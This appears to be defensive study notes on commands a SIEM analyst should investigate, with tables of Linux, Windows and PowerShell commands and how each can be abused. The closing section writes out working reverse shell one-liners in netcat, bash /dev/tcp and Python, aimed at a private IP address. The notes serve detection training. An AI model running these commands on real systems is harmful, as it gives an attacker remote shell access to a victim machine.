Interpreting Suspicious Commands

The following commands warrant further investigation.

SIEM helps locate when these commands are used on a system
May not be malicious, but warrant investigation to understand why these were used

Important Linux Commands

Command	Description
`ssh`	Used to remotely access a server and obtain shell access for administrative purposes.
`wget`	Used to interact with a web server using a command line interface.
`curl`	Similar to wget but includes more functionality.
`telnet`	A cleartext protocol used to remotely access a server. Telnet has some well-known exploitable vulnerabilities.
`ftp`	A cleartext protocol used to perform file transfer. FTP has some well-known exploitable vulnerabilities.
`arp` or `ss`	Used to identify physical addresses of hosts.
`ip` or `ifconfig`	Used to identify and change network configuration information.
`whoami`	Used to identify the current session user. Often used after obtaining shell access to determine privilege levels.
`netstat`	Used to display network activity, in particular active IP addresses and ports.

Important Windows Commands

Command	Description
`netstat`	Used to display network activity, in particular active IP addresses and ports.
`ping`	Used to test connectivity among network devices, can also be abused to carry data.
`ipconfig`	Used to display IP address configuration information.
`nslookup`	Used to interact with DNS using the command line.
`tasklist`	Used to display the processes running on a system.
`net <option>`	The net command is used to perform many administrative tasks.
`netsh`	Allows local and remote configuration of network-related services.
`wmic`	A command line interface to Windows Management Instrumentation (WMI).

Important PowerShell Commands

Command	Description
`Invoke-Request`	Used to remotely issue commands to a Windows system.
`Invoke-WebRequest`	Used to interact with a system using HTTP or HTTPS.
`DownloadString`	Used to download information from a web server, such as a malicious script or payload.
`Start-Process`	Starts a new process, often to load malware or a rogue process.
`Get-WMIObject`	Used to collect information from a host using Windows Management Instrumentation (WMI).
`Get-Process`	Used to display processes configured on a system.

Reverse Shells

A reverse shell describes making a victim system connect back to the attacker’s machine to establish shell access.

works even if a firewall is present

Example commands used when creating a reverse shell:

Utility or Language	Command syntax examples
netcat listener	`nc -lvnp 8181`
bash shells	`bash -i >& /dev/tcp/10.20.100.1/8181 0>&1`
	`/bin/bash -l > /dev/tcp/10.20.100.1/8181 0<&1 2>&1`
Python	`export RHOST="10.20.100.1";export RPORT=8181;python -c 'import socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'`

reverse shell commands are unlikely to be normal activity
- should be considered suspicious and potential unauthorized access